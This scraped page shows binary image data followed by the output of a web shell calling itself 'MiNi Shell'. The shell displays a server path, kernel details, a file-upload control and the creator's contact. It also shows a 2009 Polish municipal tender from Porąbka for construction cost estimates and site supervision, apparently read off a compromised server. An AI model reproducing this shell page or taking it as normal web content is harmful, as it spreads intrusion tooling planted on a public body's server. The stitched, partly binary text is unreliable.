JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090219/34512-N-2009.html

<p class="kh_header"><b>Porąbka: SPORZĄDZANIE KOSZTORYSÓW INWESTORSKICH I DOKUMENTACJI OPISUJĄCEJ PRZEDMIOT ZAMÓWIENIA NA ROBOTY BUDOWLANE,  ORAZ PROWADZENIE  NADZORU INWESTORSKIEGO NAD ROBOTAMI REMONTOWO-BUDOWLANYMI ORAZ ROBOTAMI DROGOWYMI, MOSTOWYMI I ODWODNIENIAMI, JAKIE BĘDĄ REALIZOWANE PRZEZ GMINĘ PORĄBKA W  ROKU  2009, O WARTOŚCI SZACUNKOWEJ ZADANIA NIE PRZEKRACZAJĄCEJ 1 200 000,00  ZŁOTYCH NETTO.</b><br>
<b>Numer ogłoszenia: 34512 - 2009; data zamieszczenia: 19.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Porąbka , ul. Krakowska 3, 43-353 Porąbka, woj. śląskie, tel. 033 8272802, 8272815, 8272810, faks 033 8272802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.porabka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SPORZĄDZANIE KOSZTORYSÓW INWESTORSKICH I DOKUMENTACJI OPISUJĄCEJ PRZEDMIOT ZAMÓWIENIA NA ROBOTY BUDOWLANE,  ORAZ PROWADZENIE  NADZORU INWESTORSKIEGO NAD ROBOTAMI REMONTOWO-BUDOWLANYMI ORAZ ROBOTAMI DROGOWYMI, MOSTOWYMI I ODWODNIENIAMI, JAKIE BĘDĄ REALIZOWANE PRZEZ GMINĘ PORĄBKA W  ROKU  2009, O WARTOŚCI SZACUNKOWEJ ZADANIA NIE PRZEKRACZAJĄCEJ 1 200 000,00  ZŁOTYCH NETTO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego    postępowania  przetargowego    jest   sporządzanie   kosztorysów    i dokumentacji opisującej przedmiot zamówienia na roboty budowlane, oraz  prowadzenie nadzoru inwestorskiego nad robotami remontowo-budowlanymi  oraz  robotami    drogowymi, mostowymi  i  odwodnieniami , jakie   będą   realizowane  przez  gminę Porąbka w 2009r,o wartości nie przekraczającej 1 200 000 złotych netto,  a w zakres usług w szczególności wchodzą  następujące czynności : 1.1. opracowywanie  kosztorysów inwestorskich zgodnie z Rozporządzeniem  Ministra Infrastruktury  z dnia 18 maja 2004r. w sprawie określenia metod i podstaw  sporządzenia kosztorysu inwestorskiego, obliczania  planowanych kosztów  prac projektowych oraz  planowanych kosztów robót  budowlanych określonych  w programie funkcjonalno-użytkowym (Dz.U. nr 130, poz.1389),1.2. opracowywanie  dokumentacji  dotyczącej  opisu  przedmiotu  zamówienia  na roboty budowlane zgodnie z Rozporządzeniem Ministra Infrastruktury  z dnia  2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania  i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. nr 202 poz. 2072 z póź.zm.),1.3. współpraca przy przygotowywaniu materiałów przetargowych ,udział  w typowaniu robót, uczestniczenie na wezwanie Zamawiającego w przetargach, analiza  i  porównywanie   kosztorysów    ofertowych , itp.1.4. prognozowanie w powiązaniu z zakresem rzeczowym  i  przyjętą  technologią, przybliżonego  czasu niezbędnego do realizacji  inwestycji 1.5. przygotowanie    odpowiedzi    na    pytania    kierowane    przez   oferentów  w  trakcie   postępowania przetargowego  dotyczące przedmiaru kosztorysowego robót, przyjętej technologii  oraz przewidzianych  do  wbudowania  materiałów itp. 1.6. nadzór techniczny nad realizacją  robót w imieniu  Wójta   Gminy, sprawowany    zgodnie  z   prawem budowlanym i odpowiednimi  przepisami  wykonawczymi, co w  szczególności  obejmuje: a. protokolarne przekazywanie wykonawcom uzgodnionego zakresu robót, placu budowy wg umowy, b. reprezentowanie   Inwestora   na   budowie  przez  sprawowanie   kontroli   zgodności   jej realizacji z projektem i pozwoleniem na  budowę, przepisami i obowiązującymi  Polskimi   Normami   oraz  zasadami   wiedzy  technicznej ,c. sprawdzanie  jakości   wykonanych   robót, wbudowanych wyrobów budowlanych, a w szczególności  zapobieganie   zastosowaniu   wyrobów   budowlanych   wadliwych   i   niedopuszczonych do obrotu i  stosowania w budownictwie, d.  sprawdzanie  i   odbiór  robót   budowlanych ulegających  zakryciu  lub zanikających, uczestniczenie  w próbach  i   odbiorach   technicznych   instalacji, urządzeń technicznych i przewodów kominowych  oraz    przygotowanie i udział w  czynnościach  odbioru    gotowych     obiektów    budowlanych i  przekazywanie  ich  do użytkowania, e. potwierdzanie   faktycznie  wykonywanych   robót    oraz   potwierdzanie  usunięcia   wad, a także na  żądanie inwestora , kontrolowanie  rozliczeń  budowy, f. uzgodnienia  z   Inwestorem   i  Wykonawcą robót możliwości wprowadzenia  rozwiązań zamiennych  w  stosunku  do  materiałów  i konstrukcji przewidzianych  w dokumentacji, g.  przygotowywanie odbioru końcowego robót, h. potwierdzenie zakresu  wykonanych  robót, opiniowanie kalkulacji  i  kosztorysów na  roboty  dodatkowe, itp. 1.7. Wykonywanie  bieżących ekspertyz  budowlanych. Całość zadania  w przedziale  od  14 000  do  206 000   euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6, 71.32.20.00-1, 71.52.00.00-9, 71.32.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> odstąpiono<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać wykonawcy spełniający następujące  warunki: 1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich). Warunek zostanie spełniony jeśli Wykonawca: prowadzi działalność w zakresie objętym przedmiotem zamówienia. Ocena zostanie dokonana na podstawie: złożonego aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej; złożonego oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Warunek zostanie spełniony jeśli Wykonawca  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwa zamówienia stanowiące przedmiot niniejszego postępowania ( kompleksowa obsługa: kosztorysy, nadzór). Przesłanką przesądzającą również o spełnianiu  przedmiotowego warunku przez wykonawcę jest także dysponowanie pracownikami (lub zobowiązanie że wykonawca będzie dysponował pracownikami),  którzy   posiadają   wymagane  prawem  uprawnienia. Ocena zostanie dokonana na podstawie: 1)  wykazu wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia   postępowania, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie: a) nadzorów  nad   robotami    drogowymi, mostowymi   i   odwodnieniami    oraz    usług   w   zakresie sporządzania  kosztorysów  inwestorskich  dotyczących robót  drogowych, mostowych  i odwodnień,  b) nadzorów   nad     robotami     remontowo-budowlanymi    oraz    usług    w   zakresie    sporządzania  kosztorysów  inwestorskich  dotyczących  robót  remontowo - budowlanych. Do  wykazu   należy  dołączyć  co  najmniej : a) dwa  dokumenty ( pochodzące  z  dwóch  różnych  źródeł) potwierdzające należyte wykonanie usług   w  zakresie  nadzorów  oraz  sporządzania  kosztorysów  dotyczących  robót  drogowych, mostowych  i  odwodnień, b) dwa  dokumenty  ( pochodzące  z  dwóch różnych źródeł)  potwierdzające należyte wykonanie usług w zakresie nadzorów  oraz  sporządzania  kosztorysów  dotyczących  robót remontowo-budowlanych. 2) wykazu osób i podmiotów, które  będą  wykonywać zamówienie lub będą uczestniczyć   w  jego  wykonaniu, wraz z a)  odpisami  ich  uprawnień do prowadzenia  nadzoru  inwestorskiego w  zakresie robót drogowych,  mostowych  i   odwodnień, b)   odpisami   uprawnień    do    prowadzenia  nadzoru    inwestorskiego    w    zakresie konstrukcyjno- budowlanym, instalacyjno - inżynieryjnym   dla  instalacji  sanitarnych  elektrycznych i gazowych, c)    odpisami   uprawnień   rzeczoznawcy   budowlanego. UWAGA :  przynajmniej dwóch pracowników oferenta (lub pracowników którymi oferent będzie dysponował na podstawie zobowiązania  innego podmiotu) musi posiadać   uprawnienia w zakresie robót  drogowych, mostowych  i odwodnień; przynajmniej dwóch pracowników  oferenta  (lub pracowników którymi oferent będzie dysponował na podstawie zobowiązania  innego podmiotu) musi  posiadać  uprawnieni  w  zakresie  konstrukcyjno - budowlanym; przynajmniej jeden  pracownik  oferenta  (lub pracowników którymi oferent będzie dysponował na podstawie zobowiązania  innego podmiotu) musi  posiadać  uprawnienia    w  zakresie instalacyjno - inżynieryjnym    dla   instalacji      sanitarnych,   elektrycznych i gazowych; przynajmniej  jeden   pracownik  oferenta (lub pracownik którym oferent będzie dysponował na podstawie zobowiązania  innego podmiotu)    musi  posiadać uprawnienia  rzeczoznawcy  budowlanego. Do  wykazu obok uprawnień należy  dołączyć także kserokopie  (potwierdzone  za  zgodność  z oryginałem przez oferenta) zaświadczeń wskazanych w wykazie osób  z  właściwej Izby Architektów zgodnie         z zapisami art.5  i  6  Ustawy  o  samorządach zawodowych  architektów, inżynierów  budownictwa oraz  urbanistów,  złożonego oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena zostanie dokonana na podstawie:
złożonego oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 4) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2 ustawy Prawo zamówień publicznych (Dz.U. z 2004 r. Nr 19 poz. 177 ze zm.) Warunek zostanie spełniony, jeśli Wykonawca nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków, gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Ocena zostanie dokonana na podstawie: aktualnego zaświadczenie właściwego naczelnika urzędu skarbowego  oraz aktualnego zaświadczenia właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że  wykonawca  nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne  lub  zdrowotne  oraz zaświadczeń,  że   uzyskał   przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, złożonego oświadczenia, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 5) Wykonają zlecane usługi  w terminach określonych w SIWZ. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży właściwe oświadczenie  w  zakresie  proponowanego terminu realizacji usług. 6) Zaakceptują załączony  do  specyfikacji projekt umowy. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży właściwe oświadczenie  w  zakresie  przyszłej umowy. 7)Zaakceptują stawiane przez zamawiającego warunki płatności. Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży właściwe oświadczenie  w  zakresie  warunków płatności..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)wypełniony formularz oferty, 
2)oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 oraz, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych
3)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześnie niż 6 miesięcy przed upływem terminu składnia ofert;
4)zaświadczenia z ZUS i US
5)wykaz usług wraz z referencjami
6)wykaz osób i podmiotów wraz z uprawnieniami i zaświadczeniami z właściwej izby samorządu zawodowego
7)dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przedstawionych dokumentów rejestrowych firmy ,
8)przypadku składania oferty przez wykonawców występujących wspólnie ( w tym również w ramach spółki cywilnej) - zgodnie z art. 23 Prawa zamówień publicznych wykonawcy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.  W takim przypadku do oferty należy załączyć stosowne pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.porabka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> UG Porąbka, 43-353 Porąbka, ul. Krakowska 3, pok. nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 09:00, miejsce: UG Porąbka, 43-353 Porąbka, ul. Krakowska 3, pok. nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com